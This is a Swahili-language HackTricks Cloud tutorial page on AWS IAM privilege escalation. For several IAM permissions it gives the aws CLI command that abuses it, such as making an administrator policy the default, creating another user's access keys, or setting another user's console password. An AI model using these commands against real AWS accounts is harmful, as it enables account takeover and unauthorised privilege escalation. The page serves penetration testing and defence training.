Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - IAM Privesc

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

IAM

Kwa habari zaidi kuhusu IAM angalia:

pageAWS - IAM, Identity Center & SSO Enum

iam:CreatePolicyVersion

Inatoa uwezo wa kuunda toleo jipya la sera ya IAM, ikipuuza haja ya idhini ya iam:SetDefaultPolicyVersion kwa kutumia bendera ya --set-as-default. Hii inawezesha ufafanuzi wa ruhusa za desturi.

Amri ya Udukuzi:

aws iam create-policy-version --policy-arn <target_policy_arn> \
--policy-document file:///path/to/administrator/policy.json --set-as-default

Athari: Inapandisha mojawapo moja kwa moja kwa kuruhusu kitendo chochote kwenye rasilimali yoyote.

iam:SetDefaultPolicyVersion

Inaruhusu kubadilisha toleo la msingi la sera ya IAM kwenda kwenye toleo lingine lililopo, ikiongeza uwezekano wa kupandisha viwango vya ruhusa ikiwa toleo jipya lina ruhusa zaidi.

Amri ya Bash:

aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2

Athari: Upandishaji wa mamlaka usio wa moja kwa moja kwa kuwezesha ruhusa zaidi.

iam:CreateAccessKey

Inawezesha uundaji wa kitambulisho cha ufikiaji na kitufe cha siri cha ufikiaji kwa mtumiaji mwingine, ikiongoza kwa upandishaji wa mamlaka wa uwezekano.

Tumia njia:

aws iam create-access-key --user-name <target_user>

Athari: Upandishaji wa moja kwa moja wa mamlaka kwa kuchukua ruhusa za ziada za mtumiaji mwingine.

iam:CreateLoginProfile | iam:UpdateLoginProfile

Inaruhusu kuunda au kusasisha wasifu wa kuingia, ikiwa ni pamoja na kuweka nywila kwa kuingia kwenye konsoli ya AWS, ikisababisha upandishaji wa moja kwa moja wa mamlaka.

Kutumia kwa Uundaji:

aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Kutumia kwa Ajili ya Kuboresha:

aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Athari: Upandishaji wa moja kwa moja wa mamlaka kwa kuingia kama mtumiaji yeyote.

iam:UpdateAccessKey

Inaruhusu kuwezesha ufunguo wa ufikiaji uliowezeshwa, ikiongoza kwa ufikiaji usioidhinishwa ikiwa mshambuliaji anamiliki ufunguo uliowezeshwa.

Kutumia:

aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>

Athari: Kupandisha mamlaka moja kwa moja kwa kurejesha funguo za ufikiaji.

iam:CreateServiceSpecificCredential | iam:ResetServiceSpecificCredential

Inawezesha kuzalisha au kurejesha siri kwa huduma maalum za AWS (k.m., CodeCommit, Amazon Keyspaces), kurithi ruhusa za mtumiaji anayehusika.

Tumia kwa Uundaji:

aws iam create-service-specific-credential --user-name <username> --service-name <service>

Marejeo

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

PreviousAWS - Glue PrivescNextAWS - KMS Privesc

Last updated